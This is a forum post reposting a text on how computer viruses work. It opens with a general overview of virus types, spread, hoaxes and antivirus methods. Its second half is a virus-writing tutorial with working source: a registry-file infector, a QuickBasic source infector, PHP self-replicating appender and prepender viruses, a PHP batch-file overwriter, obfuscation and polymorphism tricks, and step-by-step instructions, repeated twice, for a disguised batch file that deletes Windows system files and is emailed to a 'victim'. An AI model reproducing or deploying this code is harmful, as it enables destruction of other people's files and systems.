How do viruses work??

[kernelx]

Hello!

I find this document somewhere on the net in past, now I m going to share it here




[How Do Viruses Work?
A virus is, conceptually, a simple program. In its simplest form, a direct action virus can be modeled in terms of an algorithm like this:
begin
Look for (one or more infectable objects)
If (none found)
then
exit
else (infect object or objects).
endif
end

They don't remain in memory, but execute all their code at once, and then hand over control to the host program.
Many viruses go memory resident (install themselves into memory) after the host program is executed, so that they can infect objects accessed after the infected application has been closed. The term hybrid is sometimes used for viruses that stay active as long as the host program is running. It is also (perhaps with more justification) applied to viruses that are both direct action and memory resident.
Some viruses, of course, do more than just replicate. We sometimes describe viruses as having up to three components: an infective routine, a payload, and a trigger. The previous models demonstrate an infective routine, although it could be said that finding an infectable object is the trigger for the infective routine. However, we more often think of the trigger as being the condition that has to exist before the payload (or warhead) can be executed. The payload can, in principle, be any operation that any other program can perform. In real life, however, it tends to be something flippant and irritating, like visual or audio effects, or else downright destructive. So now our model looks more like this:

begin
(Go resident)
if (infectable object exists)
then
if (object is not already infected)
then
(infect object)
endif
endif
if (trigger condition exists)
then
(deliver payload)
endif
end

The trigger condition might, for instance, be the execution of a file, or a particular date or time. The combination of a trigger and a malicious payload is sometimes called a logic bomb.
Viruses can be classified conveniently (but by no means definitively) into five main classes: Boot Sector Infectors (BSIs); file infectors; multipartite viruses; macro viruses; and scripting viruses. Memetic viruses (virus hoaxes and other chain letters) are not viruses in the same sense as the preceding classes because they infect people, not programs. They are considered here because hoax management is usually the responsibility of the person responsible for virus management.

[Boot Sector Infectors (BSIs)]
These PC-specific viruses infect the Master Boot Record and/or DOS Boot Record. At one time, these viruses accounted for the majority of reported incidents, but now they constitute a dwindling proportion of the total number of threats found in the wild, and new BSIs are something of a rarity. This might reflect the fact that people now increasingly use email and networks rather than floppy disks to exchange files. The fact that these are harder to write than macro viruses and scripting viruses (or even file viruses) is also relevant. When a modern PC boots up, it goes through a process called Power On Self Test (POST). This stage of the boot process includes checking hardware components. Some of its information comes from information stored in CMOS, especially information relating to disk and memory type and configuration. If the CMOS settings don't match the actual drive geometry, the machine will not be able to find system areas and files where they should be, and will fail to finish the boot process. The Master Boot Record (MBR), sometimes known as the Partition Sector, is found only on hard disks, where it is always the first physical sector. It contains essential information about the disk, giving the starting address of the partition(s) into which it is divided. On diskettes, which can't be partitioned and don't contain an MBR, the first physical sector is the boot record or DBR. On hard drives, the boot record is the first sector on a partition. The boot record contains a program whose job is to check that the disk is bootable and, if so, to hand over control to the operating system. By default, if there is a bootable floppy present, most PCs will boot from drive A, the first floppy drive, rather than from drive C, the first hard drive. This is actually an unfortunate default because this is the normal entry point for a boot sector virus. If the PC attempts to boot from a floppy with an infected boot sector (even if the floppy doesn't contain the necessary files to load an operating system and therefore can't complete the boot process), the infected floppy will infect the hard drive. Characteristically (although not invariably), once the hard drive is infected, the virus will infect all write-enabled floppies. You might have heard that boot sector viruses can be disinfected without anti-virus software, using FDISK with a (largely) undocumented switch (/MBR), known in some quarters as FDISK/MUMBLE. The good news is that this works a lot of the time. The bad news is that, if you try it with the wrong virus, you can actually lose access to your data. Anti-virus software is a very imperfect technology, but it's almost invariably better and safer for removing viruses than general-purpose utilities that were never designed for that purpose. FDISK is not recommended as an anti-virus measure unless you know exactly what you're doing.
New boot sector viruses are comparatively rare. Nevertheless, even old favorites like Form still circulate among people who still exchange disks. Although reputable and up-to-date anti-virus software is still a must for detecting them, a simple precaution eliminates most of the risk of infection on most PCs, even from unknown BSIs. Most PCs, by default, will attempt to boot from drive A if there is a diskette there. If there isn't, it tries to boot from drive C. However, nearly all PCs can be reconfigured in CMOS to change this default. On most systems, this is done by modifying the boot order, so that the system always tries to boot from drive C first (or in the order CD drive, drive C, drive A). Other systems (notably some Compaq models) allow the setting of an option to disable booting from the floppy drive altogether. If the system user actually needs to boot from floppy, this simply involves resetting the option to default. Motherboard and PC system vendors use proprietary ways of setting CMOS options. Consult the documentation that came with your system. Note that "file and boot" (multipartite) viruses are less likely to be contained by this precaution.
[File Viruses (Parasitic Viruses)]
File viruses infect executable files. Historically, most file viruses have not been particularly successful in terms of their epidemiology (that is, at spreading). Many thousands have been written, but the number actually seen in the wild has been comparatively small compared to BSIs and, more recently, macro viruses. Nonetheless, those that have survived in the wild have often spread surprisingly well—CIH, for example. Some of the most prevalent contemporary file viruses, however, are more commonly described as worms. After a virus infects an executable file by direct attachment, that file, when executed, will infect other files. Fast infectors go for instant gratification. Each time the infection routine is executed, it infects a whole directory, all folders on the current path, a whole volume/disk, even all currently mounted volumes. Even file infectors that infect only one or two files at a time can spread quickly across systems and networks in a modern environment, where multiple binary executables are opened and closed many times over a single session. Every time you open an application, at least one executable file is loaded. Some applications will open several files at startup, whereas others periodically open multiple files when performing a particular operation. Binary executables are by no means restricted to .COM and .EXE files, but include DLLs (Dynamic Link Libraries), overlay files, VxDs and other classes of driver, overlay files, and even certain screensaver and font files.
[Multipartite Viruses]
File and boot viruses are the most common example of multipartite viruses, viruses that use more than one infection mechanism. In this case, both boot-sectors and binary executable files might be infected and used as the means of disseminating the virus. However, it's likely that there will be an increase in multipartite viruses consisting of other combinations of virus types.
[Macro Viruses]
Macro viruses infect macro programming environments rather than specific operating systems and hardware. Microsoft Office applications are by far the most exploited environment. These can be regarded as a special case of file virus, in that they appear to infect data files rather than binary executables. However, this way of looking at the process might actually confuse the issue. Macros are essentially a means of modifying the application environment, rather than (or as well as) the data file. Indeed, in the case of Microsoft Office applications that support macro programming languages (Visual Basic for Applications and, in earlier versions, WordBasic and AccessBasic), the macro language cannot be unbound from the application's own command infrastructure. Macro viruses usually infect the global template, and often modify commands within the application's menu system. Macro viruses are particularly successful against Microsoft applications because they allow executable code (macros) to exist in the same file as data. Applications that segregate macros and data into different files are less susceptible to this kind of attack.
[Script Viruses]
Script is rather an imprecise term, but in this context normally (currently) refers to VBScript and other malware that can be embedded in HTML scripts and executed by HTML-aware email clients through the Windows Scripting Host. Many of the viruses that use this entry point are often better characterized as worms, and are therefore treated under that heading later in the chapter. VBscript and Jscript are more virus friendly than JavaScript (for instance), primarily because they have many of the file I/O capabilities of other variations on the Visual Basic theme. Extant JavaScript malware usually takes advantage of an easily patched vulnerability in Internet Explorer.
[Memetic Viruses]
There is a further class of "viruses," which is unique, in that it comprises viruses that don't exist as computer code. The term meme seems to have been coined originally by Richard Dawkins, whose paper Viruses of the Mind draws on computer virology as well as on the natural sciences. A meme is a unit of cultural transmission, of replication by imitation, much as a gene is a unit of inheritance (a rather imprecise unit, perhaps). The memes we are most concerned with in this chapter are those sometimes known as metaviruses. A metavirus is itself a virus (what Dawkins calls a "virus of the mind, not a computer virus"), but purports to deal with other viruses (which are computer viruses). These viruses don't happen to exist. In other words, they are virus hoaxes. Virus hoaxes are not only a subclass of memes in general, but a subset of a particular type of meme, the chain letter. However, the virus hoax is particularly relevant to this chapter, because the administrator who manages virus incidents will usually also be the person who has to respond to plagues of virus hoaxes. The same might not be true of other hoaxes and chain letters.
[Spread of Viruses]

Although viruses have a history that dates back to the 1980s, their means of infection has changed over the years. Viruses depend on people to spread them. Viruses that can spread without human intervention are known as worms. Viruses require human activity such as booting a computer, executing an autorun on a CD, or opening an email attachment. There are three basic ways viruses propagate through the computer world:
1. Master boot record infection This is the original method of attack. It works by attacking the master boot record of floppy disks or the hard drive. This was effective in the days when everyone passed around floppy disks.
2. File infection A slightly newer form of virus that relies on the user to execute the file. Extensions, such as .com and .exe, are typically used. Some form of social engineering is normally used to get the user to execute the program. Techniques include renaming the program or trying to mask the .exe extension and make it appear as a graphic or .bmp.
3. Macro infection The most modern type of virus began appearing in the 1990s. Macro viruses exploit scripting services installed on your computer. Most of you probably remember the I Love You virus, a prime example of a macro infector.
After your computer is infected, the computer virus can do any number of things. Some spread quickly. This type of virus is known as fast infection. Fast infection viruses infect any file that they are capable of infecting. Others limit the rate of infection. This type of activity is known as sparse infection. Sparse infection means that the virus takes its time in infecting other files or spreading its damage. This technique is used to try and help the virus avoid infection. Some viruses forgo a life of living exclusively in files and load themselves into RAM. These viruses are known as RAM resident. RAM resident infection is the only way that boot sector viruses can spread.
As the antivirus companies have developed better ways to detect viruses, writers have fought back by trying to develop viruses that are hard to detect. One such technique is to make a multipartite virus. A multipartite virus can use more than one propagation method. For example, the NATAS (Satan spelled backward) virus would infect boot sectors and program files. The idea is that this would give the virus added survivability. Another technique that virus developers have attempted is to make the virus polymorphic. Polymorphic viruses have the capability to change their signature every time they replicate and infect a new file. This technique makes it much harder for the antivirus program to detect it.
When is a virus not a virus? When is the virus just a hoax? As most people are somewhat worried about catching a computer virus, some unscrupulous individuals have discovered that a virus hoax can be as effective as an actual virus. A virus hoax is nothing more than a chain letter that encourages you to forward it to your friends to warn them of the impending doom. To convince readers to forward the hoax, the email will contain some official sounding information that sounds valid. Hoaxes can usually be recognized by three common items. First, the email claims that the virus is undetectable. Viruses change the contents of a drive and files and, as such, can be detected. Second, the email will alert you to warn everyone you know. Real viruses get plenty of new coverage. Third, many of the claims made in the email seem farfetched. Viruses are only pieces of code, and they have limits on what they can accomplish.
Viruses must place their payload somewhere. They can always overwrite a portion of the infected file, but to do so would destroy it. Most virus writers want to avoid detection for as long as possible and might not have written the program to immediately destroy files. One way the virus writer can accomplish this is to place the virus code either at the beginning or end of the infected file. Prependers infect programs by placing their viral code at the beginning of the infected file. Appenders infect files by placing their code at the end of the infected file. This leaves the file intact while the malicious code is added to the beginning or end of the file.
No matter what infection technique, all viruses have some basic common components. All viruses have a search routine and an infection routine. The search routine is responsible for locating new files, disk space, or RAM to infect. The search routine is useless if the virus doesn't have a way to take advantage of these findings. Therefore, the second component of a virus is an infection routine. This portion of the virus is responsible for copying the virus and attaching it to a suitable host. Most viruses don't stop here and also contain a payload. The purpose of the payload routine might be to erase the hard drive, displaying a message to the monitor, or possibly sending the virus to 50 people in your address book. Payloads are not required, but without it many people might never know that the virus even existed.
Many viruses might also have an anti-detection routine. Its goal is to help make the virus more stealth like and avoid detection. Finally, there is the trigger routine. Its goal is to launch the pay-load at a given date and time. The trigger can be set to perform a given action at a given time. Some of these individuals create virus code from scratch. That takes a certain amount of technical skill. A computer virus is no different from any other computer program. The developer must have some knowledge of C programming, Visual Basic, a macro language, or other program language, such as assembly. Without those skills, it is still possible to create a computer virus, but a tool or existing virus is usually required. Virus writers can disassemble existing virus code and make subtle changes or download existing virus code.
[Virus Defense]
Prevention is better than a cure, and, as such, everything should be checked before being used. Many sites will provide an MD5sum with their programs to give users an easy way to tell that no changes have been made. Email attachments should also always be checked. In a high security controlled environment, a sheep dip system can even be used. This term originated from the practice of dipping sheep to make sure that they are clean and free of pests. A sheep dip computer can be used to screen suspect programs and connects to a network only under controlled conditions. It can be used to further examine suspected files, incoming messages, and attachments. Overall, the best way to prevent viruses is by following an easy five-point plan.
1. Install antivirus software.
2. Keep the virus definitions up-to-date. Dated antivirus is not much better than any protection at all.
3. Use common sense when dealing with attachments. If you don't know who it's from, or it looks suspicious, don't open it!
4. Keep the system patched. Many viruses exploit vulnerabilities that have previously been found and are well known.
5. Avoid attachments if possible or send them as a PDF.
There are other things you can do, such as not using Microsoft Outlook. Although that might not always be a viable option, just remember that most viruses target Outlook. Although virus prevention is good practice, there is still the possibility that your system might become infected with a virus. In general, the only way to protect your data from viruses is to maintain current copies of your data. Make sure that you perform regular system backups. A variety of tools are available to help with this task. Three types of backup methods exist including full, incremental, and differential.
Signature scanning antivirus programs work in a fashion similar to Intrusion Detection Systems (IDS) pattern matching systems. Signature scanning antivirus software looks at the beginning and end of executable files for known virus signatures. Signatures are nothing more than a series of bytes found in the virus's code. Here is an example of a virus signature:
X5O!P%@AP[4\PZX54(P^)7CC)7$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
If you were to copy this into a text file and rename it as an executable, your antivirus should flag it as a virus. It is not actually a virus, and the code is harmless. It is just a tool developed by the European Institute of Computer Antivirus Research (EICAR) to test the functionality of antivirus software. Virus creators attempt to circumvent the signature process by making viruses polymorphic.
Heuristic scanning is another method that antivirus programs use. Software designed for this function examines computer files for irregular or unusual instructions. As an example, think of your word processing program; it probably creates, opens, or updates text files. If the word processor were to attempt to format the C: drive, this is something that heuristics would quickly identify, as that's not the usual activity of a word processor. In reality, antivirus vendors must strike a balance with heuristic scanning, as they don't want to produce too many false positives or false negatives. Many antivirus vendors use a scoring technique that will look at many types of behaviors. Only when the score exceeds a threshold will the antivirus actually flag an alert.
Integrity checking can also be used to scan for viruses. Integrity checking works by building a database of checksums or hashed values. These values are saved in a file. Periodically, new scans occur, and the results are compared to the stored results. Although it isn't effective for data files, this technique is useful for programs and applications, as the contents of executable files rarely change. For example, the MD5sum of Nmap 3.1 is d6579d0d904034d51b4985fa2764060e. Any change to the Nmap program would change this hashed value and make it easy for an integrity checker to detect.
Activity blockers can also be used by antivirus programs. An activity blocker intercepts a virus when it starts to execute and blocks it from infecting other programs or data.
[File type virus]
REG Files
Every .REG file writes a key to the Registry, if they are execute. Much virus uses this for open itself at every start from the computer.
But is it possible to infect a .REG file with a own REG-infector virus? The answer is yes, because the registry is able to execute DOS commands. Here is a code from a WinREG virus:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\]
@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Run\\"
How works this virus? It write a key to the start-up registry. Because of that the next command will be execute every start of the computer. The next line search for every .REG file in the system-folder from windows and overwrite they with the code from the path which is mentioned there. This path is the virus, so every .REG file will be overwrite wit the virus. This virus won't spread much because nobody will copy a .REG file. But it shows, that .REG files can be infected. ;-)
Sourec-code Files
This files are for instands .CPP files(C++), .PAS(Pascal) or .BAS (QuickBasic)
I have written a sourec code infector, because I didn't know, that it is possible to manage:
CLS
REM The first Quick Basic infection Virus
REM written by SeCoNd PaRt To HeLl
REM for showing, that .BAS can be infected
REM NAME of the Virus: BAS.XYC
OPEN "C:\xyc.bat" FOR OUTPUT AS #1
PRINT #1, "@echo off"
PRINT #1, "if exist xyc.bas copy xyc.bas C:\xyc.bas"
PRINT #1, "for %%r in (*.bas ..\*.bas %windir%\*.bas) do copy C:\xyc.bas %%r"
CLOSE #1
SHELL "C:\xyc.bat"
This virus infects only QuickBasic sourec codes. If the infect sourec is execute, it will made a file named XYC.BAT at the path C:\. This file will be executed by the virus. If any file named xyc.bas, the batch file copies it to the path C:\xyv.bas. Then it search for every .BAS file in the current, parent and windows directory and copy the virus (C:\xyv.bas) to the files. If any infected file is executed, the virus will infect other files too, because the file xyc.bas wasn't deleting. This virus won't spread often, because the virus can overwrite files only, if the file xyv.bas is on the PC.

HTM(L) Files
HTML files can be infected. The reason for that is, that .HTM or .HTML can execute scripts like Visual Basic Script or Java Script. Here is a little sourec of the code from an .html virus:

< html>
< body>
< script language="VBScript">
. . . Script Code . . .
< /script>
< /body>
< /html>
Because of that, .HTM file are able to spread with Outlook emails or IRC (mIRC, pIRCh, vIRC, KvIRC…)

INI Files
I don't really know about it, but I think it must be possible. If any program execute a .INI file, that is infect, the .INI file could copy to the WIN.INI or SYSTEM.INI file, so the .INI file will be loaded every start of the computer. Then it could search for all .INI files from the computer and overwrite them with itself. If any program, which use an infected .INI file, will be copied to an other computer, the virus could spread. But I think, it is more work than success…

SYS files
It's the same as the .INI files, because .SYS files can't be execute by the user.
The virus must infect the CONFIG.SYS file, then try to infect other .SYS files, and if any program, use an infected .SYS file, will be copied, the virus can spread to other computers.

.TXT files
No, it's not possible to write a .TXT file virus. But if you write an .EXE virus, you can infect the NOTEPAD.EXE file, so the virus will start, if any .TXT file is execute But this isn't a really text file virus.
[PHP Viruses]
[Changing virus to ASCII]
Using the whole virus into characters should not be a big problem. Include the virus-code (written in ASCII) to a new file, run the file via 'include()', and delete it.

< ?php
$content=chr(60).chr(63).chr(112).chr(104).chr(112 ).chr(13).chr(10).chr(112).chr(114).chr(105).
chr(110).chr(116).chr(40).chr(34).chr(72).chr(105) .chr(32).chr(86).chr(88).chr(101).
chr(114).chr(33).chr(32).chr(84).chr(104).chr(105) .chr(115).chr(32).chr(105).chr(115).
chr(32).chr(106).chr(117).chr(115).chr(116).chr(32 ).chr(97).chr(32).chr(115).chr(105).
chr(108).chr(108).chr(121).chr(32).chr(116).chr(10 1).chr(115).chr(116).chr(32).chr(115).
chr(116).chr(114).chr(105).chr(110).chr(103).chr(3 2).chr(102).chr(111).chr(114).chr(32).
chr(116).chr(104).chr(101).chr(32).chr(101).chr(11 0).chr(99).chr(114).chr(121).chr(112).
chr(116).chr(105).chr(111).chr(110).chr(32).chr(10 5).chr(110).chr(32).chr(80).chr(72).
chr(80).chr(46).chr(34).chr(41).chr(59).chr(13).ch r(10).chr(63).chr(62);
copy(__FILE__,'file.php');
$a=fopen('file.php','w+');
fwrite($a, $content);
fclose($a);
include('file.php');
unlink('file.php');
?>

You should understand the prinzip of the code really fast. The encrypt code contains a 'secret' message.
'$content' contains a PHP script in ASCII form. Here you should use your virus code. Just making ASCII of the normal letters, and add them to a variable. Since the encrypt data should be a fully workable file, you have to add '<?php','?>', and the whole PHP syntax (for instands semikolons).
Makes a new file (because I couldn't find a command to make a file, I copies '__FILE__', and overwrites it.
Writes the encrypt content to the file (but now: unencrypt!)
Opens the file (via 'include(<-file->)')
Deletes the file (via 'unlink(<-file->)')

Changing the commands
Maybe you already know it, but PHP contains tons of aliases for different commands and we can use that. I'm sure you know how Just replace one command with another, which is doing the same. I made a list of commands and it's aliases, to show you, how much we are able to change. This is just a short list, nevertheless it could be useful, when you want to make such a polymorphism virus.
-----------------------------------------------------------------------
chop - rtrim()
close - closedir()
die - exit()
dir - getdir()
doubleval - floatval()
fputs - fwrite()
ini_alter - ini_set()
is_double - is_float()
is_integer - is_int()
is_long - is_int()
is_real - is_float()
is_writeable - is_writable()
join - implode()
magic_quotes_runtime - set_magic_quotes_runtime()
pos - current()
rewind - rewinddir()
show_source - highlight_file()
sizeof - count()
strchr - strstr()
Full list of aliases here: http://zend.com/phpfunc/all_aliases.php
-------------------------------------------------------------------------
CMD infection
CMD = Batch for WinNT/00/XP = DOS. And as you know you are NOT allowed to use any '>', '<' or '&' in a DOS-string. Use the characters in every string instead of the read signs. Few problems: The begin and the end of the PHP code, where we MUST write '<' or '>'. Solution: Use JavaScript file, to write the first and the last line to the .htm file. Use a script anyway for starting the Internet Explorer (to run the PHP-code - DOS can't open an Internet Browser), I used that file.
The result of code is the following file.

< ?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$string=strtok(chr(13).chr(10));
$cmdcode='cls'.chr(13).chr(10).'@echo off'.chr(13).chr(10).'del index.html'.chr(13).chr(10);
while ($string{0}!='?')
{
$cmdcode.='echo '.$string.chr(62).chr(62).'index.html'.chr(13).chr (10);
$string=strtok(chr(13).chr(10));
}
$cmdcode.='echo var fso=WScript.CreateObject("Scripting.FileSystemObje ct");'.chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo var shell=WScript.CreateObject("WScript.Shell");'.chr( 62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo all=fso.OpenTextFile("index.html").ReadAll();'.chr (62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a=fso.OpenTextFile("index.html",2);'.chr(62).chr(6 2).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Write(String.fromCharCode(60,63,112,104,112,13,1 0)+all+String.fromCharCode(13,10,63,62));'.chr(62) .chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Close();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo shell.Run("index.html");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='cscript file.js';
$directory=opendir('.');
while ($file = readdir($directory))
{
if (strstr($file, '.cmd'))
{
fwrite(fopen($file, 'w'), $cmdcode);
}
}
closedir($directory);
?>

- Reads the whole file content (the virus), and splits it to lines
- Makes the .CMD code, which don't contain any '>','<' and '&'
- Adds a JavaScript code to the .CMD code, so the first and the last lines('<?php' and '?>') will be added to the new .htm file.
- Adds a code to the .CMD code, which runs the indernet-explorer
- Overwrites every .CMD file in the current directory with the CMD-code.
Appending
An Appender is a virus, which copies itself after the victim file. It's really easy to make one. You just have to search the last php-part (or
just make a infection-mark at the begin of the virus. Then you read till the end, and you have your virus-file. The rest should clear: Search a victim, check if not infected and copy the virus-body in the end of the file. I made an exaple for that, as you migth think. The exact explanation will be in the end after the code.

< ?php // SPTH
$string='<?php // '.strstr(fread(fopen(__FILE__,'r'), filesize(__FILE__)), 'SPTH');
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, filesize($file)), 'SPTH'))
{
fwrite($victim, $string);
}
fclose($victim);
}
}
closedir($curdir);
?>

Opens the infected file, and save the virus body (searching for 'SPTH', and save the rest of the file)
Searchs for every php-file in the current directory.
Checks is not infected (searchs for the infection mark 'SPTH' anywhere in the file. If not found: Not infected
Copies the virusbody to the file

Prepending
A prepender copies it's code infront of the victim's code, therefor it will be executed before the victim. That's the main idea of this kind of infection. But there are some other important things you have to note: To get the virus out of the file, you need any information about where the virus is. In the example the virus uses the first 391 bytes. Next important thing is, that you must not infect a file two times. What do to against that? Check, if the file if already infected. In the following example the virus searchs in the first 13 bytes (in an infected file it's this code: '<?php // SPTH') if there's a
'SPTH'. If yes, the file won't be infected. Now let's look at the PHP Prepender Virus example:

< ?php // SPTH
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, 13), 'SPTH'))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filesize($file));
}
fclose($victim);
}
}
closedir($curdir);
?>

Reading the first 391 bytes (which is exactly the virus size)
Searchs for every .PHP file in the current directory
Writing your own simple virus
Step 1: Create a batch file test.bat with the following text @ echo off
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
Step 2: Convert the test.bat batch file to test.com using bat2com utility.
Step 3: Assign Icon to test.com using Windows file properties screen.
Step 4: Send the test.com file as an e-mail attachment to a victim.
Step 5: When the victim runs this program, it deletes core files in WINNT directory making Windows unusable.
For demonstration purposes, let us write a simple program that can be used to cause harm to a target system.
Step 1: Create a batch file test. bat with the following
text @ echo off
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
Step 2: Convert the test.bat batch file to test.com using bat2com utility.
Step 3: Assign Icon to test.com using Windows file properties screen.
Step 4: Send the test.com file as an e-mail attachment to a victim.
Step 5: When the victim runs this program, it deletes core files in WINNT directory making Windows unusable.

AntiVirus software
The only prevention against virus is to install anti-virus software and keep the updates current.
1. McAfee
2. NortonAntiVirus
3. Antiviral Toolkit Pro
4. Kaspersky
5. Trend Micro
6. Command AntiVirus
7. F-Secure
8. Sophos
9. NOD32
10. Avast

Viruses come in different forms. Some are mere nuisances some come with devastating consequences. E-mail worms are self replicating and clog the networks with unwanted traffic. Virus codes are not necessarily complex. It is necessary to scan the systems/ networks for infections on a periodic basis for protection against viruses. Antidotes to new virus releases are promptly made available by security companies and this forms the major counter measure.